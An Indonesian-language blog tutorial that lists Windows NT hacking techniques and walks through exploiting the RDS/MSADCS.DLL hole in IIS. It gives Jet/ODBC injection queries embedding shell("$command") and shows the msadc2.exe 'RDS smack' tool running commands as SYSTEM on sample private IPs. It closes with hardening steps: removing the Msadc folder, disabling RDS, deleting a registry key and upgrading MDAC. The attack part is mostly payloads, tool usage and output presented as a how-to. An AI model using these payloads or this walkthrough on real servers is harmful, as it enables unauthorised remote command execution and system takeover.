Hacking NT Server Melalui Remote Data Service

Hacking NT Server Melalui Remote Data Service

Penulis : Schizoprenic

Tentu dengan maksud agar para administrator bisa lebih secure menjaga servernya dan juga sebagai sarana menyebarkan ilmu pengetahuan. Teknik hacking di NT sebenarnya bermacam-macam, diantaranya adalah:



I. Initial Access Strategy

a. NETBIOS Shares using Microsoft Executables

b. NAT The NetBios Auditing Tool



II. RDS Exploitation

III. Frontpage Exploitation with Frontpage Extensions

IV. Registry Vulneralbility

a. Gaining access to registry with the AT.EXE command (local)

b. REGEDT32.EXE and REGEDIT.EXE

c. REGINI.EXE and REGDMP.EXE remote registry editing tools



V. Trojan .Ink

VI. SAM (Security Access Manager) Touching

VII. PWDump Technique



Dari teknik-teknik di atas yang menurut penulis paling menarik adalah teknik hacking melalui RDS (Remote Data Service). Teknik ini sebenarnya tidaklah baru karena beberapa hacker juga sudah familiar dengan cara ini, mungkin karena keberadaan unicode yang begitu banyak dan ampuhnya menghajar server-server NT (IIS 4.0/5.0) menyebabkan teknik ini tidak begitu populer. Di tulisan saya ini nanti saya juga akan mencoba menjelaskan bagaimana teknik pengamanannya.



Berbicara tentang RDS (Remote Data Service) tentu kita tidak akan bisa terlepas dengan induknya yaitu MDAC (Microsoft Data Access Components) dimana RDS adalah salah satu komponen dari MDAC. Perlu saya jelaskan sedikit tentang RDS (Remote Data Service). Jika Anda menginstall Windows NT 4.0 secara default aplikasi MDAC akan ikut terinstall. Windows NT 4.0 menggunakan MDAC versi 1.5. Berbicara tentang versi, ada dua versi MDAC yang vulnerable yaitu:



MDAC versi 1.5
MDAC versi 2.0


Terus bagaimana teknik ini bisa melakukan access terhadap target?. Perlu Anda pahami juga bahwa RDS dalam kerjanya melakukan koneksi dengan ODBC (Open Database Conectivity) jadi sangat mungkin untuk mengeksekusi remote command melalui ‘QUERY’. Di sini saya tidak akan menjelaskan hubungan RDS dengan MS Jet Engine dan Jet Pipe/VBA (Visual Basic Aplication) tapi yang jelas untuk melaksanakan query, RDS memerlukan MS Jet Engine dan Jet Pipe/VBA.



Tapi bagaimana cara mengeksekusi command tersebut?. Mungkin Anda pernah mendengar atau melihat satu file di NT yang bernama MSADCS.DLL dan di IIS Webserver, file ini di sertakan juga. Melalui file MSADCS.DLL atau yang dikenal sebagai ActiveDataFactory/AdvancedDataFactory kita bisa melakukan eksekusi empat command database yaitu:



Query
CreateRecordSet
ConvertToString
SubmitChanges


Tapi di sini kita hanya memerlukan dua buah command yaitu ‘QUERY’ dan ‘SUBMITCHANGES’. Kemudian kelebihan dari QUERY adalah kemampuannya untuk mengakses database di luar wilayahnya, intinya QUERY dapat memasukan informasi/data milik kita ke dalam databasenya. Contoh database yang di maksud adalah file ‘btcustmr.mdb’. Dengan menggunakan Microsoft Access Driver kita bisa meng-query ‘btcustmr.mdb’ dan membuat table yang berisi akses terhadap command shell. Contoh query di bawah ini (not all showed!):



Select * from Customers where City='shell("$command")’

Create table ABC (B int, C varchar(10))

Select * from ABC where C='shell("$command")'





Oke sekarang kita akan mencoba mempraktikan konsep hacking di atas dengan bantuan satu script buatan Rain Forest Puppy (r.f.p) yang dalam pembuatannya dia di bantu oleh ADM dan Couple dari L0pt Security.



C:\> msadc2.exe

==========================================

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

-- Property Of Xnuxer Research, Schizoprenic --



Usage: msadc2.exe -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\\host\share\file> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step



Or a -R will resume a (v2) command session



Cara kerja dari script ini adalah dengan melakukan checking terhadap file ‘msadcs.dll’ di target melalui port 80, kemudian jika di temukan di layar akan muncul tampilan seperti ini:











C:\> msadc2 –h 192.168.0.24

==========================================

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

-- Property Of Xnuxer Research, Schizoprenic --

Type the command line you want to run (cmd /c assumed):

cmd /c_



Jika file ‘msadcs.dll’ tidak di temukan maka yang muncul adalah seperti di bawah ini:



C:\> msadc2 –h 192.168.0.21

==========================================

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

-- Property Of Xnuxer Research, Schizoprenic --

Doh! They're not running IIS.





Oke sekarang kita akan mencoba mengeksekusi command ‘dir’, lihat contoh:



C:\> msadc2 –h 192.168.0.24

==========================================

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

-- Property Of Xnuxer Research, Schizoprenic --

Type the command line you want to run (cmd /c assumed):

cmd /c dir



Step 1: Trying raw driver to btcustmr.mdb

winnt -> c: Success!



Jika Anda berhasil maka beruntunglah Anda karena telah dapat menguasai system dan perlu di ketahui juga bahwa RDS running dengan authority SYSTEM jadi berhati-hatilah dengan command yang Anda pakai :) .





CARA MENGAMANKAN SYSTEM


Di rasa salah juga kalo saya tidak menyertakan cara mengamankan IIS server Anda dari teknik eksploitasi ini. Langsung saja, ada beberapa langkah yang bisa Anda lakukan untuk mengantisipasi server Anda dari serangan hacker, cracker dan script kiddies melalui teknik ini, diantaranya adalah:



Cara cepat dan mudah adalah dengan menghapusseluruh file dan folder yang berada di directory C:\Program Files\Common Files\System\Msadc


Men-disable RDS Support.


Menghapus Key Registry di bawah ini:


HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch



Atau upgrade MDAC Anda ke versi 2.1, kemudian Jet Engine 3.5 ke versi 4.0


Jika empat hal di atas telah Anda lakukan maka amanlah server Anda dari eksploitasi ini. Mudah-mudahan sedikit tulisan ini bisa bermanfaat bagi Anda. Terima Kasih.

AUTHOR: SCHIZOPRENIC

CREDIT :

- “Hacking NT in 5 Easy Step”, Throsten Sideb0ard, January 2001.

- “Windows NT Deconstruction Tatics, Step by Step NT Exploitation Techniques”, Vacuum of Rhino7 & Technotronic, Revision 5 10/01/98.

- “Understanding The RDS/IIS Exploit”, InterScape Security Resources, 1999.



SPECIAL THANKS: To All My Friend for All Support.



Anda di ijinkan menyebarluaskan informasi ini untuk di publikasikan di manapun juga asal tidak melakukan perubahan terhadap isi dan nama penulis dan juga asal untuk kepentingan penyebaran Ilmu Pengetahuan dan Pendidikan.




Schizoprenic

Tidak ada komentar:

Posting Komentar

Comment

Enter your email address:

Delivered by FeedBurner